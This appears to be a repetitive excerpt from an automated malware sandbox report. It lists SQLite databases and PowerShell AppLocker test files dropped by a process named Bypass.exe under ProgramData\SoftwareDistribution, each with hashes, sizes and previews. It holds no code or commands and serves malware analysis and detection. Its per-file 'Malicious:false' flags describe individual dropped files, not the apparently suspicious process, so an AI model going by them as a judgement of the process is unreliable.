                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
